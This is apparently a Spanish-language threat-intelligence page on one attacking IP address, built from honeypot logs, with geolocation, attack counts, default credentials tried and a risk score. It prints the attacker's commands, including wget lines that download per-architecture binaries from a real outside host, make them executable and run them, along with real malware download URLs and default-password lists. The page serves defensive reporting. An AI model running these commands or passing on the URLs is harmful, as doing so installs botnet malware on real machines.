Amenaza Activa • CRITICO
176.65.148.45
Pais de Origen🇳🇱 Paises Bajos
Primera Deteccion15/1/2026
Ultima Actividad19/2/2026
ISPPfcloud UG (haftungsbeschrankt)
🎯
1054
Ataques Totales
🔌
4
Puertos
📡
3
Tipos Ataque
🦠
18
Malware
Geolocalizacion
- Pais
- 🇳🇱 Paises Bajos
- Ciudad
- Eygelshoven
- ASN
- AS51396
- ISP
- Pfcloud UG (haftungsbeschrankt)
Tipos de Ataque
cowrie
adbhoney
honeytrap
Puertos Atacados
222331285555
Malware Asociado
Credenciales Intentadas
🔐root/admin
27x🔐root/root
12x🔐root/ubuntu
11x🔐root/debian
8x🔐admin/admin
8x🔐root/password
7x🔐user/admin
6x🔐admin/root
6x🔐123456/123456
4x🔐root/1234
4x🔐root/default
4x🔐123456/admin
4x🔐123456/user
4x🔐12345/user
3x🔐admin/1234
3xComandos Ejecutados
$
wget http://82.221.139.173:3712/bins/systemx64.arm;chmod 777 systemx64.arm;./systemx64.arm TELNETarm14x$
cd /tmp;rm -rf RANGER13x$
wget http://82.221.139.173:3712/bins/systemx64.x86;chmod 777 systemx64.x86;./systemx64.x86 TELNETx867x$
rm -rf RANGER7x$
wget http://82.221.139.173:3712/bins/systemx64.spc;chmod 777 systemx64.spc;./systemx64.spc TELNETspc7x$
wget http://82.221.139.173:3712/bins/systemx64.sh4;chmod 777 systemx64.sh4;./systemx64.sh4 TELNETsh47x$
wget http://82.221.139.173:3712/bins/systemx64.arm7;chmod 777 systemx64.arm7;./systemx64.arm7 TELNETarm77x$
wget http://82.221.139.173:3712/bins/systemx64.ppc;chmod 777 systemx64.ppc;./systemx64.ppc TELNETppc6x$
wget http://82.221.139.173:3712/bins/systemx64.mips;chmod 777 systemx64.mips;./systemx64.mips TELNETmips6x$
wget http://82.221.139.173:3712/bins/systemx64.m68k;chmod 777 systemx64.m68k;./systemx64.m68k TELNETm68k6xURLhaus Intel3 URLsabuse.ch
Esta IP ha usado las siguientes URLs maliciosas conocidas:
http://82.221.139.173:3712/c.shofflinemalware_downloadgeofencedopendirsh
http://82.221.139.173:3712/wget.shofflinemalware_downloadgeofencedopendirsh
http://82.221.139.173:3712/w.shofflinemalware_downloadgeofencedopendirsh
Evaluacion de Riesgo
80
/100
BajoMedioAltoCritico